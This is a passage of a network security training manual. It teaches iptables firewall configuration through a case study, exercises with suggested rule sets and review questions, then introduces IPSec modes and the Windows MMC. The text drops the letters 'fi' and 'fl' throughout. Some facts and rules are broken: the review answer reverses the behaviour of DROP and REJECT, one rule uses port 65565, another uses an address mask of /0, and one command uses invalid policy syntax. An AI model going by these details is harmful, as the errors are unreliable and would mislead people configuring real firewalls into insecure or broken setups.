Similar to the previous command, the only syntax difference here is in the port
numbers dened. In this rule, all ports from 5000 to 10000 are to be denied.
Configuring Masquerading
Linux does have the ability to perform IP Masquerading, which is a form of
NAT. It is not difficult to implement, and the syntax is:
iptables -t nat -A POSTROUTING -o ppp0 -j MASQUERADE
284 Tactical Perimeter Defense
For this command:
-t nat indicates that you want to congure the NAT table.
-A POSTROUTING indicates that you want to append a rule after routing
decisions are made.
-o ppp0 indicates the outgoing interface that should be used; in this case, the
PPP dialup link.
-j MASQUERADE denes the target; in this case, that the source IP address
in the IP header should be masked by the IP address of ppp0.
Case Study
This section involves review of a case study of IPTables in a working
environment. In this example, there is a single computer running as the rewall
with two Ethernet interfaces. The Ethernet 0 Interface (172.168.25.40) goes to the
Internet, and the Ethernet 1 Interface goes to the internal network. A diagram of
the network is shown in the following gure.
Figure 5-37: An example network for rewall implementation.
First, we need to dene the overall goals of the rewall. This should be done dur-
ing the creation of the security policy, and specically during the creation of the
rewall policy.
Lesson 5: Conguring Firewalls 285
Firewall Goals
The intended goals of this rewall are:
We have decided to allow ICMP pings (echo requests and echo replies)
through the rewall.
We will allow our external clients access to the email server.
Internal clients cannot use email servers on the Internet.
We will allow external clients to reach our web server.
We will block attempts to spoof internal addresses.
Configuration
First, we will congure the default policies to deny all traffic:
iptables -P INPUT -j DROP
iptables -P OUTPUT -j DROP
iptables -P FORWARD -j DROP
Next, we will congure user-dened chains. This is done to make the chains
easier to work with. For these user-dened chains, us is internal, and them is
external:
iptables -N us-them
iptables -N them-us
Next, we will create the jumps for the different networks:
iptables -A INPUT -s 10.0.20.0/24 -d ! 10.0.20.0/24 -j us-them
iptables -A INPUT -s ! 10.0.20.0/24 -d 10.0.20.0/24 -j them-us
In the rst line, if the source is us and the destination is not us (that is, them),
then the target is the user chain us-them. In the second line, if the source is not
us (them), and the destination is us, then the target is the user chain them-us.
Next, we will congure the internal (us) to external (them) chain. We start by
dening the general rules:
Allow internal machines WWW access to the outside.
Allow internal machines to be able to ping hosts on the outside.
Disallow all other outgoing traffic.
Once we know our general rules, we can congure the chain:
iptables -A us-them -p TCP -d 0/0 --dport 80 -j ACCEPT
iptables -A us-them -p ICMP -d 0/0 -j ACCEPT
Next, we will congure the external (them) to internal (us) chain. Again, we will
dene the general rules rst:
Allow hosts on the outside WWW access to the Web server.
Allow hosts on the outside to access the email server.
Allow ping.
Block internal address spoong.
Disallow all other incoming traffic.
Once we know our general rules, we can congure the chain:
Note, this is for you to
manage a simple network
resource, in your production
environment; you would
likely not allow ICMP
through the rewall.
286 Tactical Perimeter Defense
iptables -A them-us -p TCP -d 10.0.20.22 --dport 25 -j ACCEPT
iptables -A them-us -p TCP -d 10.0.20.22 --dport 110 -j ACCEPT
iptables -A them-us -p TCP -d 10.0.20.21 --dport 80 -j ACCEPT
iptables -A them-us -p ICMP -d 10.0.20.0/24 -j ACCEPT
iptables -A them-us -s 10.0.20.0/24 -j DROP
Case Study Summary
After reviewing this case study, you should be able to identify the steps of creat-
ing a basic rewall by using IPTables. To summarize:
1. The overall goals and policies of the rewall were identied.
2. The default policies were changed to be very restrictive.
3. New chains were created for ease of management.
4. The INPUT policy was congured to jump to the new user chains.
5. The user-dened chains were congured to conform to the determined
settings.
6. The chains were veried with the -L switch.
This study was designed to be a simple example of one possibility to
implementation. Other options that could be added include:
Adding full anti-spoong, thus blocking any packet from outside that has an
address of inside.
Opening ports for return communication on the high ports.
Adding checks for the SYN option.
Dening IP Masquerading.
As you can see, there are always options in rewall design. Chances are good
that while the end result may be the same, no two people will congure the
rewall in the exact same fashion every time. Rules may be in different orders,
for example (as long as they lter properly, of course). Or, perhaps someone is
ltering everything on the INPUT chain and not making smaller chains. The ex-
ibility is yours to use as you see t.
Lesson 5: Conguring Firewalls 287
TASK 5C-1
Working with Chain Management
Objective: To review a sample chain, and determine the effect it will have
on traffic.
Setup: The following is an example chain. Review it and identify
what has been implemented. Using the space provided, dia-
gram this network and answer the questions that follow.
1. Examine the following chain:
INPUT DROP
FORWARD ACCEPT
OUTPUT ACCEPT
iptables -A INPUT -p 6 -s 0.0.0.0/0 -d 192.20.0.1/32 --dport
23:23 -j ACCEPT
iptables -A INPUT -p 6 -s 0.0.0.0/0 -d 10.168.0.3/32 --dport
80:80 -j ACCEPT
iptables -A INPUT -s 10.168.0.0/24 -d 0/0 -i eth0 -j DROP
iptables -A INPUT -s 127.0.0.0/8 -d 0/0 -i eth0 -j DROP
iptables -A INPUT -s 127.0.0.0/8 -d 0/0 -i eth1 -j DROP
iptables -A INPUT -s ! 10.168.0.0/24 -d 0/0 -i eth1 -j DROP
iptables -A INPUT -p 6 -s 0/0 -d 192.20.0.1/32 ! --dport
23:23 -j DROP -y
288 Tactical Perimeter Defense
iptables -A INPUT -p 6 -s 0/0 -d 192.20.0.1/32 --dport
1024:65535 -j ACCEPT ! -y
iptables -A INPUT -p 17 -s 0/0 -d 192.20.0.1/32 --dport
1024:65535 -j ACCEPT ! -y
iptables -A INPUT -p 6 -s 0/0 -d 10.168.0.0/24 --dport
1024:65535 -j ACCEPT
iptables -A INPUT -p 17 -s 0/0 -d 10.168.0.0/24 --dport
1024:65535 -j ACCEPT
iptables -A INPUT -p 1 -s 0/0 -d 0/0 -j ACCEPT
iptables -A INPUT -s 10.168.0.0/24 -d ! 192.20.0.1/32 -j
ACCEPT
2. Diagram the network here or on another sheet. Assume the Class C
address 192.20.0.1 is an external address.
What effect does this set of rules have on the network?
Telnet and web traffc are allowed to dened hosts. Anti-IP-spoong rules
are in place. High-level ports are allowed for the return of web traffc.
What services, if any, are running on the internal network?
At least web and Telnet services.
What are the internal clients allowed to access externally?
Web and Telnet services.
Is IP spoong prevention in place?
Yes.
If an internal client ran a server, would external clients be able to access
it? Why or why not?
They could not, since the ports required to be outgoing for a server are not
open.
Lesson 5: Conguring Firewalls 289
Topic 5D
Implementing Firewall Technologies
In the previous topics, you were introduced to the concepts and conguration of
FireWall-1, ISA Server 2006, and IPTables. In this topic, you will put that knowl-
edge to use.
Scenario
The following conceptualization will be used for conguring the rewall for this
scenario. Review the network diagram and the required rules, and then proceed.
Figure 5-38: The conceptual network.
In this activity, you will be creating the conguration rst for the internal rewall
and then for the external rewall.
Firewall Rules
The following gure represents the policies that have been decided upon for the
internal rewall.
Figure 5-39: Internal rewall rules.
The following gure represents the policies that have been decided upon for the
external rewall.
290 Tactical Perimeter Defense
Figure 5-40: External rewall rules.
Configuring the Internal Firewall
The IP addresses that will be used for this are listed in the following table.
Use IP Address Subnet Mask
Internal Subnet 172.16.10.0 255.255.255.0
Security Host 172.16.10.10 255.255.255.0
Internal Web Server 172.16.100.100 255.255.0.0
Internal Firewall int 1 172.16.100.1 255.255.0.0
Internal Firewall int 2 192.168.10.1 255.255.255.0
DMZ Email Server 192.168.10.100 255.255.255.0
DMZ Web Server 192.168.10.101 255.255.255.0
External Firewall int 3 192.168.10.2 255.255.255.0
External Firewall int 4 10.10.10.10 255.255.0.0
First of all, you need to plan the chains and rules that you will use. Decide if you
will create new chains, or use the default chains. Record, on paper, the chains
and/or rule sets, and determine if they are correct before you begin
implementation. You should always plan the whole process rst. Here are some
general steps to guide you in this rst activity.
1. Decide if you will modify the default policies, and write down what you
would modify them to.
2. Decide if you want to create new rules/chains for management, and write
them down.
3. In Linux, if you created new chains, dene the jumps to these chains.
4. Dene the general goals of the rewall.
5. Write down the rules you will congure.
6. Describe how you will verify that the rules and chains are correct.
Once you have your plan written down, it is time for conguration. Using the
above steps as your general guidelines, go ahead and congure the rewall to
meet the goals you outlined. Remember, there may be several ways to accomplish
the overall goals, so no one way is to be considered correct over another. If the
goals are met efficiently, then the rules and chains are correct for that scenario.
Lesson 5: Conguring Firewalls 291
Suggested Solutions
The following are suggested solutions to the scenario for IPTables. Feel free to
compare your results to the suggested results. Again, even though they may be
different, as long as the goals are met, the rules and chains are a success.
Congure the default policies to be more restrictive, by using the DROP target:
iptables -P INPUT DROP
iptables -P FORWARD DROP
iptables -P OUTPUT DROP
Create new chains to make conguration easier:
iptables -N in-dmz
iptables -N dmz-in
iptables -N net-in
Congure the jumps to the new chains:
iptables -A INPUT -s 172.16.0.0/16 -d ! 172.16.0.0/16 -j in-dmz
iptables -A INPUT -s 192.168.10.0/24 -d 172.16.0.0/16 -j dmz-in
iptables -A INPUT -s 0/0 -d 172.16.10.0/0 -j net-in
Dene the overall goals. In this scenario, you are dealing with the packets that
are moving between the internal network to the DMZ, the DMZ to the internal
network, and the Internet to the internal network. Identify what traffic is allowed
in different directions.
From the guidelines given, we can identify the following:
The internal network can access the WWW server on the DMZ and the
Internet.
The DMZ and Internet cannot access WWW on the internal network.
The internal network can access the email server on the DMZ, but not on
the Internet.
The DMZ and Internet cannot access email on the internal network.
The Security Host can Telnet to the DMZ and the Internet.
The DMZ and Internet cannot telnet to the internal network.
The dened internal subnet can FTP to the DMZ and the Internet.
The DMZ and Internet cannot FTP to the internal network.
Ping is allowed in both directions.
Congure the rules.
Based on the guidelines, the following conguration is one suggestion for solving
this scenario. Congure one chain at a time:
iptables -A in-dmz -p TCP -d 192.168.10.101 --dport www -j ACCEPT
iptables -A in-dmz -p TCP -d 192.168.10.100 --dport smtp -j
ACCEPT
iptables -A in-dmz -p TCP -d 192.168.10.100 --dport pop3 -j
ACCEPT
iptables -A in-dmz -p TCP -s 172.16.10.10/32 -d 0/0 --dport
telnet -j ACCEPT
iptables -A in-dmz -p TCP -s 172.16.10.0/24 -d 192.168.10.0/24
--dport 20:21 -j ACCEPT
iptables -A in-dmz -p TCP -d 0/0 --dport www -j ACCEPT
iptables -A in-dmz -p ICMP -d 0/0 -j ACCEPT
iptables -A in-dmz -p 6 -d 0/0 --dport 1024:65535 ! --syn -j
292 Tactical Perimeter Defense
ACCEPT
iptables -A in-dmz -p 17 -d 0/0 --dport 1024:65535 -j ACCEPT
iptables -A dmz-in -p ICMP -d 172.16.0.0/16 -j ACCEPT
iptables -A dmz-in -p TCP -d 172.16.0.0/16 --dport 1024:65535 !
--syn -j ACCEPT
iptables -A dmz-in -p UDP -d 172.16.0.0/16 --dport 1024:65535 -j
ACCEPT
iptables -A net-in -p 1 -d 172.16.0.0/16 -j ACCEPT
iptables -A net-in -p 6 -d 172.16.0.0/16 --dport 1024:65535 !
--syn -j ACCEPT
iptables -A net-in -p 17 -d 172.16.0.0/16 --dport 1024:65535 -j
ACCEPT
As was stated before, this isnt only one possible solution. Compare the solutions
you came up with to this one and to the others in the class. Discuss with each
other the different points in each solution.
Configuring the External Firewall
After you have congured your rewall to simulate the rst scenario, you are
ready to move on to the second scenario. The premise is the same, and the net-
work layout is the same. The only difference is that this time you are conguring
the rules on the external rewall.
Before we can proceed to congure the rules, we need to remove the chains that
are currently in place. Again, there are different ways to accomplish this, but here
is a suggestion:
1. Flush all rules from all the chains you have created, by using the iptablesF
chainname command.
2. Delete the chains after the rules have been ushed, by using the iptablesX
chainname command.
3. Modify the default policies back to Accept, so that the system is back to the
state it was when you began this topic (as if no rules or modications have
taken place at all). Use the iptables P chain ACCEPT command.
The IP addresses that will be used for this are listed in the following table.
Use IP Address Subnet Mask
Internal Subnet 172.16.10.0 255.255.255.0
Security Host 172.16.10.10 255.255.255.0
Internal Web Server 172.16.100.100 255.255.0.0
Internal Firewall int 1 172.16.100.1 255.255.0.0
Internal Firewall int 2 192.168.10.1 255.255.255.0
DMZ Email Server 192.168.10.100 255.255.255.0
DMZ Web Server 192.168.10.101 255.255.255.0
External Firewall int 3 192.168.10.2 255.255.255.0
External Firewall int 4 10.10.10.10 255.255.0.0
Lesson 5: Conguring Firewalls 293
First of all, you need to plan the chains and rules that you will use. Decide if you
will create new chains, or use the default chains. Record, on paper, the chains
and/or rule sets, and determine if they are correct before you begin
implementation. You should always plan the whole process rst. Here are some
general steps to guide you in this rst activity:
Decide if you will modify the default policies, and write down what you
would modify them to.
Decide if you want to create new rules/chains for management, and write
them down.
In Linux, if you created new chains, dene the jumps to these chains.
Dene the general goals of the rewall.
Write down the rules you will congure.
Describe how you will verify that the rules and chains are correct.
Once you have your plan written down, it is time for conguration. Using the
above steps as your general guidelines, go ahead and congure the rewall to
meet the goals you outlined. Remember, there may be several ways to accomplish
the overall goals, so no one way is to be considered correct over another. If the
goals are met efficiently, then the rules and chains are correct for that scenario.
Suggested Solutions
The following are suggested solutions to the scenario for IPTables. Feel free to
compare your results to the suggested results. Again, even though they may be
different, as long as the goals are met, the rules and chains are a success.
Congure the default policies to be more restrictive, by using the DROP target:
iptables -P INPUT DROP
iptables -P FORWARD DROP
iptables -P OUTPUT DROP
Create new chains to make conguration easier:
iptables -N in-net
iptables -N dmz-net
iptables -N net-dmz
iptables -N net-in
Congure the jumps to the new chains, and congure IP spoong rules:
iptables -A INPUT -s 172.16.0.0/16 -d 0/0 -i eth1 -j DROP
iptables -A INPUT -s 192.168.0.0/16 -d 0/0 -i eth1 -j DROP
iptables -A INPUT -s 127.0.0.0/8 -d 0/0 -i eth1 -j DROP
iptables -A INPUT -s 172.16.0.0/16 -d ! 172.16.0.0/16 -j in-net
iptables -A INPUT -s 192.168.10.0/24 -d ! 192.168.10.0/24 -j
dmz-net
iptables -A INPUT -s 0/0 -d 192.168.10.0/24 -j net-dmz
iptables -A INPUT -s 0/0 -d 172.16.0.0/16 -j net-in
Dene the overall goals. In this scenario, you are dealing with the packets that
are moving between the Internet, the internal network, and the DMZ. Identify
what traffic is allowed in different directions.
294 Tactical Perimeter Defense
From the guidelines given, we can identify the following:
The internal network can access the WWW service on the Internet.
The internal network cannot access email on the Internet.
The internal subnet can access FTP on the Internet.
The Security Host can access Telnet on the Internet.
The internal network can ping the Internet.
The DMZ can ping the Internet.
The Internet can access the WWW server on the DMZ.
The Internet can access the email server on the DMZ.
The Internet cannot ping the DMZ.
The Internet cannot ping the internal network.
Congure the rules.
Based on the above guidelines, the following conguration is one suggestion for
solving this scenario. Congure one chain at a time:
iptables -A in-net -p TCP -d 0/0 --dport www -j ACCEPT
iptables -A in-net -p TCP -s 172.16.10.0/24 -d 0/0 --dport 20:21
-j ACCEPT
iptables -A in-net -p TCP -s 172.16.10.10/32 -d 0/0 --dport
telnet -j ACCEPT
iptables -A in-net -p ICMP -d 0/0 -j ACCEPT
iptables -A in-net -p TCP -d 0/0 --dport 1024:65535 ! --syn -j
ACCEPT
iptables -A in-net -p UDP -d 0/0 --dport 1024:65565 -j ACCEPT
iptables -A dmz-net -p ICMP -d 0/0 -j ACCEPT
iptables -A dmz-net -p TCP -d 0/0 --dport 1024:65535 ! --syn -j
ACCEPT
iptables -A dmz-net -p UDP -d 0/0 --dport 1024:65565 -j ACCEPT
iptables -A net-dmz -p TCP -d 192.168.10.100 --dport pop3 -j
ACCEPT
As was stated before, this isnt the only possible solution. Compare the solutions
you came up with to this one and to the others in the class. Discuss with each
other the different points in each solution.
Summary
In this lesson, you worked with standard rewall implementation practices.
You learned that vendors implement their rewall products slightly differ-
ently from each other, but that they do follow some standard implementation
practices in most situations. You worked with two industry leaders in
rewall systems: Microsofts ISA Server 2006, and Linuxs embedded
rewall, IPTables.
Lesson 5: Conguring Firewalls 295
Lesson Review
5A What is a network rewall?
A rewall can be described as a security mechanism that places limitation
controls on all inbound and outbound network communications between indi-
vidual systems or entire networks of systems by permitting, denying, or
acting as a proxy for all data connections.
What is a rewalls primary responsibility?
Controlling access requests across differing zones of trust.
Name six basic building blocks or elements of rewall access rules.
Source Address, Destination Address, Protocol, Source Port, Destination
Port, and Service.
What layers of the OSI model do rewalls operate on?
Data Link, Network, Transport, Session and Application Layers (2, 3, 4, and
7).
What does it mean when a rewall is stateful?
The rewall keeps track of the state of all accepted connections in a data
table that resides in memory. This enables the rewall to determine if an
incoming packet is either a new connection or is part of an existing estab-
lished connection.
What are the three common rewall topologies?
Perimeter topology, three-legged DMZ topology, and chained DMZ topology.
5B True or False? You need to have the install partition formatted to NTFS
when installing ISA Server 2006 on a Windows 2003 Server.
True
Is ISA Server Firewall available in a rewall appliance?
Yes! There are a wide range of manufacturers that offer ISA-based
appliances.
What are the three panes in the ISA Server 2006 Management console?
Console Tree, Details, and Task panes.
List some things that can be a trigger for an ISA alert.
Responses might include Event Log Failure, Intrusion Detected, IP Spoong,
and Oversize UDP Packet.
How do you back up or restore the conguration of ISA Server 2006?
By exporting or importing the conguration to an XML le.
296 Tactical Perimeter Defense
What is difference between an access rule and a publishing rule in ISA
Server 2006?
Access rules control outbound communication, while publishing rules control
inbound communication.
What are the features in ISA Server 2006 that can help manage band-
width consumption?
Forward and reverse caching and packet prioritization.
5C What is the difference between the DROP target and the REJECT tar-
get?
Dropping the connection complies with TCP/IP rules of communicationan
ICMP message is sent back to the packets origin. Rejecting the connection
simply drops a packet and does not inform the sender.
What must be done before a chain can be deleted?
You must ush the rules.
What is the switch for deleting a rule?
-D deletes a rule (-F ushes and -X deletes a chain).
5D What is the function of --dport 1024:65535 ! -syn in the exercises?
Destination port should be in the range 1024-65535, but without the SYN
ag set.
Why is the ltering of ping done in two lines, rst disallowing
echorequests, and then allowing ICMP?
Because there are many uses for ICMP other than ping, such as Timed Out
and Host Unreachable messages, closing all ICMP would cause problems.
Why is it a good idea to congure the default policies rst?
Because those congurations are instant, no one can sneak through the
rewall while the policies are being created.
Lesson 5: Conguring Firewalls 297
298 Tactical Perimeter Defense
Implementing IPSec and
VPNs
Overview
In this lesson, you will be introduced to the concepts of IPSec. You will
examine and congure the Microsoft Management Console and identify the
predened IPSec policies in Windows Server 2003. You will create new
policies and implement IPSec to specically use AH, ESP, or both, in Trans-
port Mode. Finally, you will analyze IPSec traffic in Network Monitor.
In this lesson, you will examine Virtual Private Networks (VPNs) and some
of the security issues related to them.
Objectives
To be able to implement IPSec and Virtual Private Networks, you will:
6A Dene the function of IPSec in a networked environment.
Given a running network, you will examine the IPSec structure, cryptog-
raphy, the Encapsulating Security Payload, the Authentication Header, the
Internet Key Exchange, and modes of Implementation.
6B Examine IPSec policy management.
Given a running network, you will examine the IPSec structure, cryptog-
raphy, the Encapsulating Security Payload, the Authentication Header, the
Internet Key Exchange, and modes of implementation.
6C Implement and examine IPSec AH congurations.
Given a Windows 2003 computer, you will implement and analyze IPSec
AH sessions.
6D Implement and examine IPSec AH and ESP congurations.
Given a Windows 2003 computer, you will implement and analyze IPSec
AH and ESP sessions.
6E Examine the business drivers and technology components for a VPN.
In this topic, you will examine standard business drivers and technology
components in order to successfully implement a VPN solution.
6F Examine the concepts of IPSec and other tunneling protocols.
In this topic, you will investigate the components of IPSec, how IPSec
works and identify other VPN tunneling protocols, such as Point-to-Point
Tunneling Protocol (PPTP) and Layer 2 Tunneling Protocol (L2TP).
Data Files
RFCs
Lesson Time
3 hours
LESSON
6
Lesson 6: Implementing IPSec and VPNs 299
6G Analyze secure VPN design and implementation issues.
In this topic, you will take the necessary steps required to analyze secure
VPN design objectives and VPN implementation issues.
6H Examine the issues of VPN and rewall architecture and VPN
authentication.
In this topic, you will address various VPN and rewall architectures and
examine issues related to authentication.
6I Congure VPN options built into Windows 2003.
In this topic, you will perform tasks related to setting up VPN options
built into Windows 2003 Server related to VPNs.
300 Tactical Perimeter Defense
Topic 6A
Internet Protocol Security
The Internet Protocol (IP) by itself has no security. There are no built-in mecha-
nisms to ensure the security of the packets. It has become possible for attackers
to create bogus packets, posing as IP addresses that they are not. It has also
become possible for attackers to intercept packets as they are transmitted on the
Internet, and read into the payload of the packets. Due to the above-mentioned
points, there is no way for the security professional to guarantee any of the fol-
lowing:
That a packet is from the source IP address.
That a packet was not copied or intercepted by a third party during
transmission.
That a packet holds the original data that was transmitted.
These issues combine to illustrate that security of the packets themselves is
required.
IPSec, or IP Security (described in detail in RFC 2401), can provide this security.
In the simplest denition, IPSec protects IP datagrams. In a more detailed deni-
tion, IPSec provides condentiality, integrity, and authentication.
Condentiality means there is a system of making the data unreadable by
unauthorized individuals.
Integrity means that there is a guarantee that data is not altered between the
sender and the receiver.
Authentication means that the receiver is guaranteed that the sender is not an
imposter.
The way that IPSec is able to provide this protection is by specifying how the
network traffic is going to be protected, and to whom the traffic will be sent. The
way the traffic is going to be protected will be through an IPSec protocol such as
the Authentication Header (AH) or the Encapsulating Security Payload (ESP).
The operation of IPSec is completely transparent to the end-user. This is due to
the fact that IPSec functions just above the Network layer (the IPSec protocols
AH and ESP have their own IP protocol IDs), so they are well under the Applica-
tion layer. Providing this automatic protection is signicant in the choice of
whether or not to implement IPSec. The end result is that network traffic is
encrypted on one end and decrypted on the other, without the upper-layer applica-
tions at either end worrying about the complexities of the encryption/decryption
processes.
Lesson 6: Implementing IPSec and VPNs 301
Cryptography and Keys
IPSec is able to provide protection by encrypting and decrypting data. Although a
detailed discussion of cryptography is beyond the scope of this book, the very
basics are required. (A detailed discussion and hands-on study of cryptography
and encryption techniques will be undertaken in Level 2 of the SCP.)
Any le before encryption is typically referred to as plaintext. Once that le is
encrypted, using a mathematical algorithm, it is referred to as ciphertext. In order
to decrypt this le (or message), you must have a key that can reverse the
encryption. You can think of an encryption algorithm as a lock and the key as the
locks combination. If a document is locked, you need a key to unlock it. Often
in cryptography, one key is used to lock (encrypt) the document, and the same
key or a different key is used to unlock (decrypt) the document, depending upon
the methodology chosen. If a different key is used, the two keys are linked to
each other via the algorithm and the associated mathematical functions.
IPSec requires that users have a method of exchanging (sometimes called negoti-
ating) their keys.
One method is called manual distribution. In the simplest denition, this lit-
erally means each user manually giving every other user his or her key.
Manual distribution will more likely be done with what is called a KDC, or
Key Distribution Center.
The second method is automatic distribution. With automatic distribution, the
concept is that keys are exchanged only when needed. The default IPSec
implementation of automatic key distribution is called Internet Key
Exchange (IKE). You can also implement an automated version of the KDC,
such as Kerberos implementation.
Modes
IPSec has the ability to protect either the complete IP packet or just the upper-
layer protocols. The distinction between the two creates two different modes of
implementation.
One mode is called Transport Mode. In this implementation, IPSec is pro-
tecting upper-layer protocols.
The other mode is called Tunnel Mode. In this implementation, IPSec pro-
tects the entire (tunneled) IP payload.
When Transport Mode is used, the IPSec headers (AH and/or ESP) are inserted
between the IP header and the TCP header. When Tunnel Mode is used, the
IPSec header is inserted between the original IP header (now tunneled) and a new
IP header. Tunnel Mode is commonly used to create VPNs between networks.
Along with specifying a mode, the actual decision on the use of AH and/or ESP
(or the other way around) is required. Since there are two modes of implementa-
tion, and two protocols that can be selected, there are four possible methods of
protection using IPSec. You can use any of the following:
ESP in Transport Mode
ESP in Tunnel Mode
AH in Transport Mode
AH in Tunnel Mode
cryptography:
The art of science
concerning the principles,
means, and methods for
rendering plaintext
unintelligible and for
converting encrypted
messages into intelligible
form.
plaintext:
Unencrypted data.
key:
A symbol or sequence of
symbols (or electrical or
mechanical correlates of
symbols) applied to text in
order to encrypt or decrypt.
302 Tactical Perimeter Defense
Over and above that, ESP offers message integrity (authentication) and condenti-
ality (encryption). AH offers only message integrity. Tunnel Mode ESP encryption
encrypts all of the tunneled data (that is, tunneled IP header and everything
within), while Transport Mode ESP does notand cannotencrypt the IP header.
Thus the IPSec implementation that offers the maximum protection is ESP in
Tunnel Mode.
ESP in Transport Mode
In Transport Mode, ESP encrypts and authenticates application data, such as
email, web pages, and so forth; however, it does not protect the IP addresses. If a
packet is captured and analyzed by an attacker, although the data is encrypted,
the sender and receiver IP address information is freely available. Both hosts who
are in communication must have IPSec installed and congured to prevent this
from occurring.
ESP in Tunnel Mode
In Tunnel Mode, ESP encrypts and authenticates application data, just as in
Transport Mode. In this situation, the ultimate source and destination IP addresses
are also encrypted because they are encapsulated (tunneled). The reason for this
is that IPSec is implemented on the tunnel endpoints, and not required on the
hosts themselves. If this packet is captured and analyzed by an attacker, the
attacker will be able to determine only that a packet was sent. None of the con-
tents, including the original source and destination, can be found freely. Of
course, the external IP headers (that of the tunnel endpoints) can be read.
AH in Transport Mode
AH provides authentication of application data. AH does not provide encryption
services like ESP, only authentication services (as the name indicates). In Trans-
port Mode, there is similarity to ESP, though, in that both end users must have
IPSec installed and congured.
AH in Tunnel Mode
In Tunnel Mode, AH authenticates application data from one endpoint to another,
often network gateways or rewalls. There is no encryption provided, only
authentication. If ESP authentication is turned on, then AH is rarely implemented
in Tunnel Mode.
IPSec Implementation
As you identied in the previous section, there are various modes of implement-
ing IPSec. One of the primary questions to answer is: Where are the endpoints in
your network going to be? Are the endpoints the actual hosts? Or, are the
endpoints the rewalls?
If true end-to-end security is required between two hosts, then implementing
IPSec on each host is the way to go. However, scaling that up to all the hosts in
the network can become difficult to implement and manage.
Imagine that you and your coworkers all pass open notes to each other in your
organization. In order to prevent a third user from seeing the note sent between
any two users, you build an infrastructure of opaque PVC pipes between each
coworker in your organization. If there are a total of ve workers, you have to
authenticate:
To establish the validity of a
claimed user or object.
rewall:
A system or combination of
systems that enforces a
boundary between two or
more networks. A gateway
that limits access between
networks in accordance with
local security policy. The
typical rewall is an
inexpensive micro-based
UNIX box kept clean of
critical data, with many
modems and public network
ports on it, but just one
carefully watched connection
back to the rest of the
cluster.
Lesson 6: Implementing IPSec and VPNs 303
have an infrastructure of [5 x (51)]/2or 10 pipes. In this office, each person
holds four pipes. Now, increase the number of workers to 100. You will need an
infrastructure of [100 x (1001)]/2or 4950 pipes, and each person holds 99
pipes. Lots of secure links to pass things back and forth through, but not that effi-
cient overall.
This is what happens when you implement IPSec in Transport Modeyou basi-
cally create many virtual secure pipes between each host and the rest of the hosts.
If host-to-host implementation is chosen, the likely solution will be to use the
IPSec function of the OS, such as Windows 2000. If this is the case, IPSec func-
tions normally, at the Network layer, performing its function and moving on.
Sometimes though, IPSec may be implemented underneath an existing implemen-
tation of the IP protocol stack, between the native IP and the local network
drivers (see RFC 2401). In such a scenario, this is referred to as a Bump in the
Stack implementation.
Yet another option for IPSec implementation is to use a dedicated piece of
hardware. This equipment would attach to an interface, or a router, and perform
the specic encryption functions externally of other components. This is called a
Bump in the Wire implementation. This offers excellent performance in regards
to the processing of encryption and decryption. It is not suitable for all imple-
mentations, however, as adding a physical dedicated piece of equipment to links
may not be a budgetary option for an organization.
TASK 6A-1
Describing the Need for IPSec
1. Why is IPSec becoming a requirement in networks that need secure
communication?
There is no security in the standard IP that is used today. IP can be cap-
tured, analyzed, and more with no prevention. IPSec allows for the security
of the actual packets themselves, without relying on Application-level
encryption.
Topic 6B
IPSec Policy Management
Implementing and managing IPSec policies in Windows is accomplished by using
the Microsoft Management Console. In this topic, you will use the MMC to per-
form the many tasks of IPSec implementation.
The MMC
Microsoft introduced the Microsoft Management Console (MMC) in Windows
NT. The MMC is a highly congurable tool used to manage and congure system
and application settings.
304 Tactical Perimeter Defense
In the rst task, you will become familiar with the MMC conguration options
and create some customized settings. The MMC, as you rst use it, will be
blankyou select the conguration options. In Figure 6-1, you will see that there
are two places to use a drop-down menu. The rst is the overall MMC, called
Console1 by default. This menu bar has three menus: Console, Window, and
Help. The second menu bar contains the commands from the current option, also
called a plug-in. The default plug-in is called Console Root. This has three com-
mands: Action, View, and Favorites.
In the default plug-in, Console Root, there are two tabs: Tree and Favorites. The
Tree tab shows the items that are available in this plug-in. Items can include fold-
ers, web pages, other snap-ins, and more. The Favorites tab is used to manage
shortcuts to items in the Console Tree. This enables you to create a customized
grouping of tools and shortcuts that you frequently use to manage aspects of your
system.
The Tree and Favorites tabs are located in what is called the Left Pane of the
snap-in. This is where the options are expanded, selected, and possibly added to
Favorites. On the right side of the dividing line is what is called the Right Pane.
In the Right Pane, you will nd the details of any object that is selected in the
Left Pane.
Figure 6-1: The blank MMC console.
TASK 6B-1
Examining the MMC
Setup: You are logged on to Windows 2003 Server as Administrator.
1. Choose StartRun.
2. In the Run box, type mmc to start the Microsoft Management Console.
3. Choose FileAdd/Remove Snap-In.
Lesson 6: Implementing IPSec and VPNs 305
4. On the Standalone tab, click Add.
5. Scroll down, select IP Security Policy Management, and click Add.
6. If necessary, select Local Computer, and click Finish.
7. Click Close to close the Add Standalone Snap-in dialog box.
8. Click OK, and leave the MMC open for the next task.
IPSec Policies
In Windows 2003, there are predened IPSec security policies. These policies
allow for implementation of IPSec with minimal effort on the part of the
administrator. As an administrator, you must identify the needs for IPSec in your
environment, then enable the proper policy to meet those needs. The three pre-
dened policies are:
Client (Respond Only): The policy of Client (Respond Only) is used for nor-
mal communication, which is not secured. What this means is that any
Windows 2003 machine (Professional or Server) with this policy enabled
will have the ability to communicate using IPSec if required or requested.
Such a machine will not enforce IPSec when initiating communications with
any other machine.
Secure Server (Require Security): The policy of Secure Server (Require
Security) is used when all IP network traffic is secured. What this means is
that any Windows 2003 machine (Professional or Server) with this policy
enabled will always enforce secure communications using IPSec. It will
never fall back to unsecured communications.
Server (Request Security): The policy of Server (Request Security) is used
when IP network traffic is to be secured, and to allow unsecured communica-
tion with clients that do not respond to the request. What this means is that
any Windows 2003 machine (Professional or Server) with this policy enabled
will rst look to enforce communications using IPSec. If the other machine
cannot use IPSec, the rst machine will fall back to unsecured
communications.
TASK 6B-2
Identifying Default IPSec Security Policies
Setup: You are logged on to Windows 2003 Server as Administrator,
the MMC is running, and the IP Security Policy Management
snap-in has been added.
1. In the left pane, select IP Security Policies On Local Machine. Three poli-
cies are shown in the right pane.
security policies:
The set of laws, rules, and
practices that regulate how
an organization manages,
protects, and distributes
sensitive information.
These policies are also
available in Windows XP.
306 Tactical Perimeter Defense
2. Examine the three policies to see if any are currently assigned.
By default, they are not assigned.
3. Leave the MMC open for the next task.
Saving the Customized MMC Configuration
Since you have congured the MMC just as you wish, you should save this con-
guration so that it is easy to bring back up. Although you can go through the
steps of adding the snap-in as you did earlier, to do so each time is cumbersome,
and is not required.
TASK 6B-3
Saving a Customized MMC
Setup: You are logged on to Windows 2003 Server as Administrator,
the MMC is running, and the IP Security Policy Management
snap-in has been added.
1. Choose FileExit.
